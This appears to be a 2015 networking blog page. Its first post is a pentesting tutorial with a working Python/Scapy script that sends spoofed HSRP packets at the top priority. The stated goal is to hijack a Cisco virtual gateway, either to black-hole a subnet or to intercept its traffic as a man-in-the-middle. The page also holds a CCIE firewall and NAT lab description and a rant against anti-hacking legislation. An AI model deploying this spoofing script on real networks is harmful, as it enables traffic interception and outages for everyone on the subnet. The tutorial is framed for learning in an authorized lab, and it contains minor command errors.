Monday, January 19, 2015

Simple Python: Owning (Unauthenticated) HSRP

Hey all,

I'm just starting to learn some scripting in order to hone my skills at pentesting. I've decided to start with Python since it's simple and many pentesting tools are written in it.

This post is about using a Python tool called "Scapy" (link) to pwn HSRP. Scapy is capable of taking user input and generating packets of all varieties. By feeding Scapy the proper input, it can generate an HSRP packet every few seconds and redirect an HSRP VIP to... anywhere, really.

One use case is to redirect HSRP to an invalid IP, paralyzing a local subnet. A more interesting and devious use case is to redirect HSRP to your own local machine, turn on packet forwarding, and suddenly you're a man-in-the-middle (MitM) for everyone on your subnet.

Now, a little background. HSRP is Cisco's VIP (Virtual IP) solution. It's typically used by several routers to share an IP and allow for smooth transition if one of the routers suffers a failure. Routers will multicast on a subnet to in the hopes of reaching neighbors. Routers self-identify their 'priority,' (as well as other VIP qualities) which is a highest-wins integer.

By default, HSRP is authenticated with a simple text string of "cisco". A default authentication string is hardly better than nothing to protect from a bad actor. We'll assume here that HSRP is setup in this way. I'll see if I can tackle simple authenticated (string) or MD5 auth'd later.

NOTE: As with any tool, it can be misused. Only use tools such as this on networks you own or have received explicit, written permission to test on. I recommend using VirtualBox and GNS3 in order to give you a safe environment to play.

1. Start Wireshark (formally Ethereal) and watch the line. Wireshark is able to identify HSRP packets directly - look for Protocol = HSRP. Expand the "Cisco Hot Standby Router Protocol" inner layer and look for several items:
a) Group #
b) Virtual IP Address
c) Priority - Look through a few HSRP packets and find the highest priority. Our spoof packets will need to have a higher priority than what you find, else nothing will occur. My python program later uses 255 (the highest value) later, so this should be a non-issue.
d) Authentication Data (The default string is "cisco". If you see any other string here, you'll need to specify it when generating the HSRP spoofed packets)
e) Hellotime and hold-time
2. Download and install Scapy (if not already) on your Linux distro. It'll depend on your distro, but Debian-based systems can use: sudo yum -y install scapy

3. In a terminal window, create a file in some folder: vi

4. Check what interfaces you have with ifconfig

5. Paste this program into your new Python file:
print('Python script to redirect HSRP groups without security')

# Import Scapy functions
from scapy.all import *

# Gather information and set to variables
hsrpInterface = raw_input("What is your HSRP interface - note: get from ifconfig")
hsrpGroup = int(raw_input("What is the HSRP Group #?  "))
hsrpIP = raw_input("What is the HSRP Group Virtual IP?  ")
hsrpRepeat = int(raw_input("How often should the spoofed packets be sent (in seconds)?  "))
hsrpPriority = int("255")
hsrpSourceIP = raw_input("What should the source IP be?   ")

ip = IP(src=hsrpSourceIP, dst='')
udp = UDP()
hsrp = HSRP(group=hsrpGroup, priority=hsrpPriority, virtualIP=hsrpIP)
send(ip/udp/hsrp, iface=hsrpInterface, inter=hsrpRepeat, loop=1)

6. Run the program with sudo rights, so it has the ability to generate packets. The program will query you for all the information it requires, and then will start sending spoofed traffic.

Provided you input the correct information, any routers on the same subnet will see the new HSRP player and traffic will start to be redirected to the IP you specified.


Thursday, January 15, 2015

CCIE Route/Switch v5: GNS3 ZBFW, Subnet Overlap, NAT Trickery

Hey all,

This lab features a number of technologies melded together to achieve some cool stuff. In a typical service provider environment a few different partners will connect to a single entity (the provider). That provider is required to not bridge the partner networks in any way (if the provider wants to stay in business, that is). There is often a requirement to avoid simple routing, as subnets will often overlap.

This is assuming the provider hasn't embraced the awesomeness that is VRFs all over their network.

When things don't work right, the network engineer team must prove what connections are made and what aren't, a difficult thing when you can't see the whole picture. Zone-based firewall bridges that gap in spectacular fashion. It allows an engineer to see each and every session that is generated through the device. It allows matching of ACLs for allowed traffic - and here I use the same ACLs to match NAT statements in order to not overlap subnets with the partners.

BGP is also used as an IGP for each of our partners and our core network, but you could just as easily connect with a partner via a single-use IGP (ospf, eigrp, etc.) and then redistribute on both side.

Other cool stuff I didn't even mention:
Prefix lists to match routes
Route-maps applied in and out from the provider to each partner via BGP to only allow in/out selected, required routes (don't want to bleed any routes in or out, do we?).

The lab is built with all c7200 IOS routers in GNS3. Hopefully you can find an IOS in that same family so you can turn it all on.
Download the GNS3 files here and enjoy!

Good luck!

I Might Be a Felon, and You Could Be, Too!

Inspired by this article in wired, I decided to put down this rant
Pres. Obama will recommend "hacking" be upgraded to a racketeering crime, which means associates of hackers and those which knowingly spread illegal information can be charged with up to 20 years in prison with a felony charge.
This sounds like a good thing, right? Hackers are bad guys. Well, the stuff that I post all the time (on software issues, company data leaks, etc.) falls under this law. If I were ever to come under scrutiny by any gov't entity, they could lean on me with racketeering or hacking charges.
And if you have ever reposted anything I put on here about software vulnerabilities, guess what? You can be charged with felony racketeering. Maybe our prison cells will be close together!
Please, vote against this law if it comes up to that. Exploring and helping fix software does not deserve a felony charge. We cannot continue to persecute our computer security experts and expect to remain a secure country in a globally connected world.
Kyler Middleton, Computer Security Enthusiast and Potential Felon